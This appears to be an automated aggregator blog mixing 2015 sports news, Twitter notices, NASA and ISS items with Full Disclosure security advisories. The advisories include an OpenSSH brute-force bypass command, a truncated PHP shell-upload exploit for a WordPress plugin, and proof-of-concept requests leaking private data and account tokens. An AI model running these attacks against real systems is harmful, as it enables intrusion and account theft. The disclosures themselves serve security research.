
Saturday, July 18, 2015

Orioles Highlight: Chris Tillman allows leadoff single, no other hits in 8 IP, Manny Machado 20th HR in win over Tigers (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Jamaica beats Haiti 1-0, will play US in Gold Cup semifinal

BALTIMORE (AP) Houston Dynamo forward Giles Barnes scored in the seventh minute, and Jamaica beat Haiti 1-0 Saturday night to reach its first CONCACAF Gold Cup semifinal since 1998.

from FOX Sports Digital http://ift.tt/1Lvn2a1
via IFTTT

I have a new follower on Twitter


spanish words
learn new spanish words of the day
Phoenix

Following: 1438 - Followers: 1258

July 18, 2015 at 08:48PM via Twitter http://twitter.com/spaniishhh

Anonymous on Twitter: "SHOT THE WRONG MAN??? http://ift.tt/1HBK3p8"

Anonymous added,. The Cryptosphere @_Cryptosphere. 'Guy Fawkes' #Anonymous Masked Man Dead After RCMP Shooting now UPDATED: shot ...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/YourAnonNews/status/622253436382351361&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFZtQ2w8j05ghJnQK34_LX05WXC0w
via IFTTT

Dempsey's 3 goals lift US over Cuba 6-0, into Gold Cup semis

BALTIMORE (AP) Clint Dempsey scored on a fourth-minute header, added a pair of second-half goals for his first international hat trick, and the United States routed Cuba 6-0 on Saturday to reach its eighth straight CONCACAF Gold Cup semifinal.

from FOX Sports Digital http://ift.tt/1DnITK0
via IFTTT

Bartomeu elected for 2nd term as Barcelona president

BARCELONA, Spain (AP) Josep Bartomeu was re-elected president of Spanish football club Barcelona on Saturday, capitalizing on the team's success last season to defeat three challengers despite being a suspect in a fraud case and a FIFA ban on signing new players.

from FOX Sports Digital http://ift.tt/1MAH55s
via IFTTT

[FD] Information Exposure Vulnerability in WordPress Mobile Pack Wordpress Plugin v2.1.2 and below

# Title: Information Exposure Vulnerability in WordPress Mobile Pack Wordpress Plugin v2.1.2 and below
# Submitter: Nitin Venkatesh
# Product: WordPress Mobile Pack Wordpress Plugin
# Product URL: http://ift.tt/1GGXPIr
# Vulnerability Type: Information Exposure[CWE-200]
# Affected Versions: v2.1.2 and below. Installed v2.1.3 before June 3, 2015 also affected.
# Tested versions: v2.1.2, v2.1.3 (prior to June 3, 2015)
# Fixed Version: v2.1.3
# Link to code diff: http://ift.tt/1TJnLar
# Changelog: http://ift.tt/1VfhchG
# CVE Status: None/Unassigned/Fresh

## Product Information:

The NEW WordPress Mobile Pack allows you to 'package' your existing content into a cross-platform mobile web application.

## Vulnerability Description:

Information Disclosure - Returns the contents of a privately published post in JSON

## Proof of Concept:

http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78

### Sample HTTP Request

    GET /wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78 HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

### Sample HTTP Response

    HTTP/1.1 200 OK
    Date: Wed, 03 Jun 2015 00:02:46 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.9
    Content-Length: 462
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/json; charset=UTF-8

    exportarticle({"article":{"id":78,"title":"Private Post!!!","timestamp":1432955820,"author":"admin","date":"Sat, May 30, 2015, 03:17","link":"http:\/\/localhost\/?p=78","image":"","description":"<p>Should be invisible<\/p>\n","content":"<p>Should be invisible<\/p>\n","comment_status":"open","no_comments":0,"show_avatars":true,"require_name_email":true,"category_id":1,"category_name":"Uncategorized","related_posts":"","related_web_posts":"","zemanta":false}})

## Solution:

Upgrade to v2.1.3. Users who installed v2.1.3 before June 3, 2015 should re-download and re-install the package.

## Disclosure Timeline:

2015-06-01 - Discovered. Contacted developer on support forums.
2015-06-03 - Mailed report to developer.
2015-06-03 - Updated v2.1.3 released.
2015-07-18 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

Source: Gmail -> IFTTT-> Blogger

Re: [FD] weblogin software cross site request

: Dork: intitle:weblogin intext:"This page will redirect you to:"

A single site runs this 'WebLogin'.

: Product:WebLogin

What is the vendor URL? Or there is none, because this is a site-specific issue for lanl.gov. Worse, it has pretty aggressive filtering and will not render script tags, HTML tags, and requires the http:// element it seems. So this is a site specific issue, with no real value or merit, and doesn't apply to anyone else in the world?

: Rootktit Pentester.

Really?

Source: Gmail -> IFTTT-> Blogger

Re: [FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

On 17/07/15 10:04, king cope wrote:
> OpenSSH has a default value of six authentication tries before it will
> close the connection (the ssh client allows only three password
> entries per default).
>
> With this vulnerability an attacker is able to request as many
> password prompts limited by the “login grace time” setting, that is
> set to two minutes by default.
>
> Especially FreeBSD systems are affected by the vulnerability because
> they have keyboard-interactive authentication enabled by default.
>
> A simple way to exploit the bug is to execute this command:
>
> ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targethost
>
> This will effectively allow up to 10000 password entries limited by
> the login grace time setting.
>
> The crucial part is that if the attacker requests 10000
> keyboard-interactive devices openssh will gracefully execute the
> request and will be inside a loop to accept passwords until the
> specified devices are exceeded.
>
> Here is a patch for openssh-6.9p1 that will allow to use a wordlist
> and any passwords piped to the ssh process to be used in order to
> crack passwords remotely.
>
>

Source: Gmail -> IFTTT-> Blogger

Pele has back surgery, leaving Sao Paulo hospital next week

SAO PAULO (AP) Pele has successfully undergone back surgery for nerve root decompression and his postoperative recovery is satisfactory, the Albert Einstein Hospital in Sao Paulo said on Saturday.

from FOX Sports Digital http://ift.tt/1DnyHRG
via IFTTT

Banned FIFA official pleads not guilty to racketeering

NEW YORK (AP) A former top FIFA official pleaded not guilty Saturday to racketeering and bribery charges in a corruption case aimed at soccer's governing body that has sent shock waves through the sport.

from FOX Sports Digital http://ift.tt/1MAyqjH
via IFTTT

Dempsey, Johannsson start up top for US against Cuba

BALTIMORE (AP) U.S. coach Jurgen Klinsmann has made three changes to his starting lineup for the Gold Cup quarterfinal against Cuba, starting Omar Gonzalez for suspended defender John Brooks, and Clint Dempsey and Aron Johannsson in place of Chris Wondolowski and Alfredo Morales.

from FOX Sports Digital http://ift.tt/1J7Luhm
via IFTTT

Brazil soccer great Pele is hospitalized

SAO PAULO (AP) A Brazilian hospital says Pele is hospitalized in Sao Paulo.

from FOX Sports Digital http://ift.tt/1gGO7f0
via IFTTT

Message to @Beneful, @Purina, @Nestle :: We are #Anonymous

Message to @Beneful, @Purina, @Nestle :: We are #Anonymous.

from Google Alert - anonymous http://ift.tt/1DnlGrn
via IFTTT

I have a new follower on Twitter


About My World
Your smile makes my world shine like a star and every thought of you makes my problems disappear.


Following: 2707 - Followers: 2533

July 18, 2015 at 12:14PM via Twitter http://twitter.com/Aboutmyworldd

Hertha Berlin signs Czech midfielder Darida from Freiburg

BERLIN (AP) Hertha Berlin signed Czech Republic midfielder Vladimir Darida from relegated Bundesliga side Freiburg on Saturday.

from FOX Sports Digital http://ift.tt/1LhQxxF
via IFTTT

FIFA leaders return to Zurich, ready to pick election date

GENEVA (AP) FIFA leaders this weekend return to the scene of a criminal investigation which sent football's governing body into crisis eight weeks ago.

from FOX Sports Digital http://ift.tt/1RGdRJ6
via IFTTT

WhatsApp, Viber and Skype Internet Calls may No Longer be FREE in India

We all are aware of Net Neutrality and the recent controversies over it in India. Net Neutrality is simply the Internet Freedom — Free, Fast and Open Internet for all.  India has been battling for Net Neutrality since zero-rating services such as Facebook’s Internet.org and Airtel Zero were announced. The Department of Telecommunications (DoT) has now released a much-awaited report [


from The Hacker News http://ift.tt/1Kd3Eji
via IFTTT

Like It Or Not... You Can't Disable Windows 10 Automatic Updates

Windows 10 is all set to launch on July 29 and will also be available on USB drives for purchase in retail channels. So, if you are planning to install Windows 10 Home, one thing you must keep in mind: whether you wish it or not, the software updates for Microsoft’s new operating system will be mandatory. Microsoft is planning to make a significant change to its software update policy by "


from The Hacker News http://ift.tt/1DmGAqr
via IFTTT

Nasri goal gives Manchester City 1-0 win over Melbourne City

GOLD COAST, Australia (AP) Midfielder Samir Nasri's 86th-minute goal Saturday gave Manchester City a 1-0 win over its co-owned A-League side Melbourne City.

from FOX Sports Digital http://ift.tt/1VdALa7
via IFTTT

Anonymous confessions about hockey, from the Whisper App

Anonymous confessions about hockey, from the Whisper App. BarDown Staff (@BarDown) Jul. 17, 2015 9:42 PM. Looking to get some things off your ...

from Google Alert - anonymous http://ift.tt/1RFTFqH
via IFTTT

Brazil's soccer chief decides not to travel to Switzerland

SAO PAULO (AP) The president of the Brazilian football confederation will not attend FIFA's upcoming executive committee meeting in Switzerland, where his predecessor was arrested on corruption charges less than two months ago.

from FOX Sports Digital http://ift.tt/1GrUMP1
via IFTTT

Charon


Icy world Charon is 1,200 kilometers across. That makes Pluto's largest moon only about 1/10th the size of planet Earth but a whopping 1/2 the diameter of Pluto itself. Charon is seen in unprecedented detail in this image from New Horizons. The image was captured late July 13 during the spacecraft's flight through the Plutonian system from a range of less than 500,000 kilometers. For reference, the distance separating Earth and Moon is less than 400,000 kilometers. Charonian terrain, described as surprising, youthful, and varied, includes a 1,000 kilometer swath of cliffs and troughs stretching below center, a 7 to 9 kilometer deep canyon cutting the curve of the upper right edge, and an enigmatic dark north polar region unofficially dubbed Mordor. via NASA http://ift.tt/1Gps8Op

Friday, July 17, 2015

Food Addicts in Recovery Anonymous Meeting

If you're struggling with food, come to a Saturday morning Food Addicts in Recovery Anonymous 12-step meeting. FA is for anyone who suffers from ...

from Google Alert - anonymous http://ift.tt/1MgnkDn
via IFTTT

Don't Wanna Die Anonymous

Aired on 07 / 16 / 2015. Watching a sold out Afghan Whigs reunion show leads Johnny to try and get his old band back together. An FX Original Series ...

from Google Alert - anonymous http://ift.tt/1HAcXGh
via IFTTT

Orioles Video: Chris Davis robbed by another leaping catch at wall, Ubaldo Jimenez allows 7 R in loss to Tigers (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

US forward Sydney Leroux needs ankle surgery

CHICAGO (AP) U.S. women's national team forward Sydney Leroux will have surgery on her right ankle and will be sidelined for as much as three months.

from FOX Sports Digital http://ift.tt/1SsPwlc
via IFTTT

US forward Morgan has knee surgery

PORTLAND, Ore. (AP) U.S. women's national team forward Alex Morgan had surgery on her right knee and is expected to be out for three to four weeks.

from FOX Sports Digital http://ift.tt/1I9vXwS
via IFTTT

Cuba says 4 players absent for Gold Cup quarterfinal vs US

BALTIMORE (AP) When it comes to Cuba's soccer team, you can't even tell the players with a scorecard.

from FOX Sports Digital http://ift.tt/1I9xPro
via IFTTT

President of Bolivia's soccer federation arrested

LA PAZ, Bolivia (AP) Police in Bolivia have arrested the president of the nation's soccer federation for alleged corruption.

from FOX Sports Digital http://ift.tt/1HA1HcS
via IFTTT

Judge in California dismisses soccer concussion lawsuit

SAN FRANCISCO (AP) A federal judge in California has dismissed a lawsuit against US Soccer and other soccer organizations that said they had not done enough to reduce the risk of injury from concussions and repetitive heading of balls.

from FOX Sports Digital http://ift.tt/1VbYuaw
via IFTTT

[FD] weblogin software cross site request

Hi, people, I discovered a cross site request in this Dork: intitle:weblogin intext:"This page will redirect you to:"

This cross site request is exploited like this example: http://target/Login:%20Weblogin%20%20This%20page%20will%20redirect%20you%20to

[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability

Benjamin, What is an androidios device account? Is that a typo? And does the default "mobile/alpine" user account suffice? It isn't clear to me whether the iOS device needs to be jailbroken for this exploit to work. The

Source: Gmail -> IFTTT-> Blogger

[FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

OpenSSH has a default value of six authentication tries before it will close the connection (the ssh client allows only three password entries per default).

With this vulnerability an attacker is able to request as many password prompts limited by the “login grace time” setting, that is set to two minutes by default.

Especially FreeBSD systems are affected by the vulnerability because they have keyboard-interactive authentication enabled by default.

A simple way to exploit the bug is to execute this command:

    ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` targethost

This will effectively allow up to 10000 password entries limited by the login grace time setting.

The crucial part is that if the attacker requests 10000 keyboard-interactive devices openssh will gracefully execute the request and will be inside a loop to accept passwords until the specified devices are exceeded.

Here is a patch for openssh-6.9p1 that will allow to use a wordlist and any passwords piped to the ssh process to be used in order to crack passwords remotely.

Source: Gmail -> IFTTT-> Blogger
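A detection sketch for the MaxAuthTries bypass described in the post above, added here as an example and not part of the original advisory or of OpenSSH: it counts failed prompts per sshd child process (one per connection) and flags any connection that logged more failures than MaxAuthTries permits. The log lines are constructed, and the failure-line formats (`error: PAM: ...`, `Failed keyboard-interactive/pam ...`, rsyslog's `message repeated N times`) are assumptions about what your syslog records.

```python
import re

MAX_AUTH_TRIES = 6  # OpenSSH default quoted in the advisory

# Constructed sample auth log (documentation IP ranges, made-up host and PIDs).
SAMPLE_LOG = """\
Jul 18 09:14:02 bsd1 sshd[4101]: error: PAM: authentication error for root from 203.0.113.7
Jul 18 09:14:03 bsd1 sshd[4101]: error: PAM: authentication error for root from 203.0.113.7
Jul 18 09:14:03 bsd1 sshd[4102]: Failed keyboard-interactive/pam for alice from 198.51.100.20 port 50211 ssh2
Jul 18 09:14:04 bsd1 sshd[4101]: error: PAM: authentication error for root from 203.0.113.7
Jul 18 09:14:09 bsd1 sshd[4101]: message repeated 9 times: [ error: PAM: authentication error for root from 203.0.113.7]
Jul 18 09:14:10 bsd1 sshd[4102]: Failed keyboard-interactive/pam for alice from 198.51.100.20 port 50211 ssh2
Jul 18 09:14:15 bsd1 sshd[4102]: Accepted keyboard-interactive/pam for alice from 198.51.100.20 port 50211 ssh2
Jul 18 09:20:30 bsd1 sshd[4103]: error: PAM: authentication error for illegal user admin from 192.0.2.44
Jul 18 09:20:41 bsd1 sshd[4103]: message repeated 5 times: [ error: PAM: authentication error for illegal user admin from 192.0.2.44]
"""

# "sshd[PID]: message" - the PID identifies the per-connection sshd child.
SSHD_RE = re.compile(r"sshd\[(?P<pid>\d+)\]: (?P<msg>.*)")
# rsyslog collapses identical lines into "message repeated N times: [ msg]".
REPEAT_RE = re.compile(r"message repeated (?P<n>\d+) times: \[\s*(?P<inner>.*?)\s*\]")
# Assumed failure formats: PAM error line and sshd's own "Failed ..." line.
FAIL_RE = re.compile(
    r"(?:error: PAM: .+? for (?:illegal user |invalid user )?\S+ from (?P<pam_host>\S+)"
    r"|Failed (?:keyboard-interactive/pam|password) for (?:invalid user )?\S+ "
    r"from (?P<ssh_host>\S+))"
)


def parse_failure(line):
    """Return (pid, remote_host, occurrences) for a failure line, else None."""
    m = SSHD_RE.search(line)
    if m is None:
        return None
    msg, count = m.group("msg"), 1
    rep = REPEAT_RE.fullmatch(msg)
    if rep:
        # The summary line stands for N further copies of the bracketed message.
        msg, count = rep.group("inner"), int(rep.group("n"))
    f = FAIL_RE.match(msg)
    if f is None:
        return None
    return m.group("pid"), f.group("pam_host") or f.group("ssh_host"), count


def failures_per_connection(lines):
    """Map sshd PID -> (remote_host, failed prompts seen on that connection).

    PIDs are recycled, so feed this a bounded window (for example one
    log rotation), not months of history.
    """
    totals = {}
    for line in lines:
        hit = parse_failure(line)
        if hit is None:
            continue
        pid, host, count = hit
        first_host, seen = totals.get(pid, (host, 0))
        totals[pid] = (first_host, seen + count)
    return totals


def flag_bypass(lines, max_tries=MAX_AUTH_TRIES):
    """Connections with more failures than MaxAuthTries should not exist."""
    return sorted(
        (pid, host, n)
        for pid, (host, n) in failures_per_connection(lines).items()
        if n > max_tries
    )


if __name__ == "__main__":
    for pid, host, n in flag_bypass(SAMPLE_LOG.splitlines()):
        print("sshd[%s] from %s: %d failed prompts on one connection" % (pid, host, n))
```

A connection that sits exactly at the limit (PID 4103 in the sample) is not flagged; only counts above MaxAuthTries indicate that the limit was not enforced.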

Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: http://ift.tt/1fNXjxW
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site

Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.

Vulnerability: The code in mailcwp-upload.php doesn't check that a user is authenticated or what type of file is being uploaded; any user can upload a shell to the target wordpress server:

    $message_id = $_REQUEST["message_id"];
    $upload_dir = $_REQUEST["upload_dir"];
    .
    .
    $fileName = $_FILES["file"]["name"];
    move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http server root.

CVEID:
OSVDB:

Exploit Code:

    'shell.php','file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url);
    curl_setopt($ch, CURLOPT_POST,1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $result=curl_exec ($ch);
    curl_close ($ch);
    echo "
    ";
    echo $result;
    echo "
    ";
    ?>

Advisory: http://ift.tt/1I9jICg

Source: Gmail -> IFTTT-> Blogger

[FD] 1503A - Chrome - ui::AXTree::Unserialize use-after-free

*TL;DR*
After 60 day deadline has passed, I am releasing details on an unfixed use-after-free vulnerability in Chrome's accessibility features, which are disabled by default. The issue does not look exploitable.

*More details*
http://ift.tt/1HzOH6Y

*Chromium bug*
http://ift.tt/1I9jICa

Cheers,
SkyLined

Source: Gmail -> IFTTT-> Blogger

Frimpong sent off in Russia after apparent racist abuse

MOSCOW (AP) Former Arsenal player Emmanuel Frimpong faces a multi-game ban after he was sent off in Russia for his response to alleged racist abuse.

from FOX Sports Digital http://ift.tt/1CHecET
via IFTTT

Delph makes U-turn, leaves Aston Villa for Man City

MANCHESTER, England (AP) England midfielder Fabian Delph has signed a five-year contract with Manchester City, just days after telling Aston Villa fans he was staying with the Premier League club.

from FOX Sports Digital http://ift.tt/1J5HyOd
via IFTTT

Prosecutor confirms FIFA official in US to face charges

NEW YORK (AP) Prosecutors have confirmed that a top FIFA official has arrived in the United States to face racketeering and bribery charges.

from FOX Sports Digital http://ift.tt/1VbkFxH
via IFTTT

Hacker Earns 1.25 Million Free Frequent Flyer Miles On United Airlines

What if you get 1 Million Frequent Flyer Miles for Free? Yes, 1 Million Air Miles… …I think that would be enough for several first-class trips to Europe or up to 20 round-trips in the United States. Two Computer Hackers have earned more than 1 Million frequent-flyer miles each from United Airlines for finding multiple security vulnerabilities in the Airline's website. Back in May


from The Hacker News http://ift.tt/1HDK8qb
via IFTTT

I have a new follower on Twitter


Jewish Quotes
Funny Jewish sayings have been around a long time. We are going to look at some of these sayings, some funny quotes ..


Following: 1382 - Followers: 1203

July 17, 2015 at 11:30AM via Twitter http://twitter.com/JewishQuotess

Spain government honours football greats Casillas, Xavi

MADRID (AP) The Spanish government has honored Iker Casillas and Xavi Hernandez for their long and successful careers at Real Madrid and Barcelona that ended this summer.

from FOX Sports Digital http://ift.tt/1RDHTx6
via IFTTT

[FD] AirDroid ID - Client Side JSONP Callback Vulnerability

Document Title:
===============
AirDroid ID - Client Side JSONP Callback Vulnerability

References (Source):
====================
http://ift.tt/1NY5zqz

Release Date:
=============
2015-07-10

Vulnerability Laboratory ID (VL-ID):
====================================
1544

Common Vulnerability Scoring System:
====================================
5.6

Product & Service Introduction:
===============================
Calls, SMS, and the app notifications you allowed, mirrored to the large computer screen you are focusing on. Type with full physical keyboard and control with mouse. Transfer things faster without looking for a cable. Better equipments, better life. AirMirror, a brand new way of interacting between PC/Mac and your Android. Your Android, right on your computer, right now. With the new Desktop client, your Android, Windows and Mac work like one.

(Copy of the Vendor Homepage: http://ift.tt/1bNgRQx )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side vulnerability in the official AirDroid ID login online-service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-07-06: Researcher Notification & Coordination (Hadji Samir)
2015-07-07: Vendor Notification (Android Security Team)
2015-07-09: Vendor Response/Feedback (Android Security Team)
2015-07-10: Vendor Fix/Patch (Android Developer Team)
2015-07-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Sand Studio
Product: Airdroid - Online Service (Web-Application) 2015 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side jsonp callback vulnerability has been discovered in the official Airdroid online-service web-application. The vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise session data.

The vulnerability is located in the callback parameter value of the vulnerable signIn.html file. The vulnerability allows remote attackers to inject script code by client-side manipulated GET method requests. The vulnerability allows remote attacker to call an callback JSONP for get the information about the user. The vulnerability allows remote attackers to callback script code by client-side manipulated GET method requests. Thus can result in an id account or device compromise. The attack vector of the vulnerability is located on the client-side and the request method to inject/execute is GET. The service replies via jsonp by a callback with wrong cleanup which results in the unexpected behaviour.

The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the cross site scripting web vulnerability requires no privilege web application user account and low user interaction (click). Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Login [Web] (./p14/user/)

Vulnerable File(s):
[+] signIn.html

Vulnerable Parameter(s):
[+] callback

Proof of Concept (PoC):
=======================
The client-side callback vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: *.html

JSONP Call

Vulnerable Source: JSONP Call

    samir({"code":"1","result":{"id":"9731220","nickname":"Hadji+Samir","mail":"info.dimanet@gmail.com","create_date":"2015-07-06 06:18:40","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"0","avatar_url":"","last_update_avatar":"2015-07-06 06:18:40","country":"DZ","isPremium":-1,"is_recurring":0,"has_device":"1","device":[{"id":"10257826","name":"htc HTC T528w","deviceId":"3cacf266733309329510a4d2477ace37","channelToken":"2785903c941c8450ebf816b47dab1164","logicKey":"6227d20a5103046b92d118d5db9e2e67","manu":"htc","model":"HTC T528w","model_pic":"http:\/\/img.airdroid.com\/devices\/default","osVersion":"4.1.1","sdkApiLevel":"16","netOpts":{"ip":"192.168.1.4","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true","file_port":8765},"appVer":"20142","gcmId":"","is_default":"0","imsi":"0","create_date":"2015-07-06 06:20:18","account_id":"9731220","push_token":"20a2a64bd6cb1608cb2fc1c1bb1ed18b","support_plugin_vnc":0,"plugin_vnc_versions":0,"plugin_vnc_url":"","plugin_vnc_log":"","plugin_vnc_update_from_url":"false","phone_versions":0,"pc_versions":"","mac_versions":"","addon_package_name":""}],"app_last_modify":"1436177702","token":"","avatar":[],"push_ws_sub_url":"ws:\/\/54.227.249.159:443","push_tcp_sub_url":"54.227.249.159:80","push_pub_url":"http:\/\/push.airdroid.com","pc_push_token":"99eb3edebbbc30883679e563d0ed2d1f","web_push_token":"b585e6763f41df6c8fcf1961f38c6d74","fmp_push_token":"d15b2f78e335b68186bab0664c027520","account_type":2,"is_unlock":0,"max_file_size":31457280,"lan_trans_folder":0,"unlock_starttime":"","unlock_expired":"","server_timestamp":14362728935628},"msg":"success!"})

Reference(s):
http://ift.tt/JCvqri
http://ift.tt/1fPT8Sv

Solution - Fix & Patch:
=======================
Parse in the jsonp GET method request the vulnerable callback value to prevent client-side script code injection attacks. Restrict the callback input by a whitelist and disallow special chars on server-side or client-side GET method requests.

Security Risk:
==============
The security risk of the vulnerability in the android id login web-application is estimated as high. (CVSS 5.6)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [samir@evolution-sec.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x
Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab
Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS
Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger
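The fix recommended in the advisory above (restrict the `callback` value by a whitelist and disallow special characters), sketched as server-side validation. This is an added example, not AirDroid's or Vulnerability Lab's code; the function names, the 64-character limit and the `onSignIn` callback name are assumptions, and the request values are constructed.

```python
import json
import re

# Character allowlist: a plain identifier, at most 64 characters.
# fullmatch() is used on purpose: with re.match and a trailing "$",
# a value such as "cb\n" would still pass.
CALLBACK_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")

NOSNIFF = {"X-Content-Type-Options": "nosniff"}


def is_safe_callback(name, allowed_names=None):
    """Accept only identifier-shaped names, optionally from a fixed set."""
    if not isinstance(name, str) or CALLBACK_RE.fullmatch(name) is None:
        return False
    return allowed_names is None or name in allowed_names


def encode_payload(payload):
    """Serialize to JSON that stays inert if the body is ever parsed as HTML.

    json.dumps escapes non-ASCII by default (including U+2028/U+2029);
    the replacements below also neutralise "<", ">" and "&".
    """
    text = json.dumps(payload)
    return (text.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


def jsonp_response(callback, payload, allowed_names=None):
    """Return (status, headers, body) for a JSONP request.

    A rejected callback is never echoed back into the response.
    """
    if not is_safe_callback(callback, allowed_names):
        headers = dict(NOSNIFF, **{"Content-Type": "text/plain; charset=utf-8"})
        return 400, headers, "invalid callback"
    headers = dict(NOSNIFF, **{"Content-Type": "application/javascript; charset=utf-8"})
    return 200, headers, "%s(%s);" % (callback, encode_payload(payload))


# Constructed callback values: one benign, three that must be refused.
CONSTRUCTED_CALLBACKS = [
    "onSignIn",
    "alert(document.cookie)//",
    "<script>x</script>",
    "onSignIn\n",
]


def demo(allowed_names=frozenset({"onSignIn"})):
    """Status code returned for each constructed callback value."""
    payload = {"code": "1", "msg": "success!"}
    return [jsonp_response(cb, payload, allowed_names)[0]
            for cb in CONSTRUCTED_CALLBACKS]


if __name__ == "__main__":
    print(demo())
```

Validating the callback addresses the script-injection half of the report; any origin that can load the endpoint in a script tag still receives the data, so responses carrying account details also need an authorization decision.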

ISS Daily Summary Report – 07/16/15

Late Notice Conjunction: The Flight Control Team was notified of a late notice, red conjunction early this morning with insufficient time to execute a Predetermined Debris Avoidance Maneuver (PDAM). The ISS crew was directed to take steps to safe the ISS and shelter in place in the Soyuz. The conjunction passed without incident and the crew re-ingressed the ISS. NanoRack Cubesat Deployer (NRCSD) Operations: The final 4 CubeSats were successfully deployed overnight. Kelly coordinated with ground teams who used the Japanese Experiment Module Remote Manipulator System (JEMRMS) to return the Multi-Purpose Experiment Platform (MPEP) containing the NRCSD #5  to the JEMAL slide table. The slide table was retracted, bringing the MPEP inside the JEMAL.  Kelly will configure the JEMAL and monitor NRCSDs in preparation for A/L depress next week.   Synchronized Position Hold, Engage, and Reorient Experimental Satellites (SPHERES) Slosh: Kelly reviewed on board training (OBT) materials on general SPHERES operation and procedures specific to SPHERES Slosh. He also stowed charged batteries and installed other batteries for charging for the upcoming SPHERES Slosh session scheduled for Friday. The SPHERES Slosh investigation uses small robotic satellites to examine how liquids move around inside containers in microgravity. A water bottle’s contents slosh around differently in space than on Earth, but the physics of liquid motion in microgravity are not well understood, which affects computer simulations of liquid rocket fuel behavior. Middle school and high school students control the SPHERES to study how liquids behave inside containers in space, which increases the safety and efficiency of future rockets.  Resistance to Radiation; Ras Labs-CASIS-ISS Project for Synthetic Muscle: Resistance to Radiation (Synthetic Muscle):  Kelly took the 4th data set of historical photos documenting the synthetic muscle samples. Crew transferred photos to an SSC for photo downlink. 
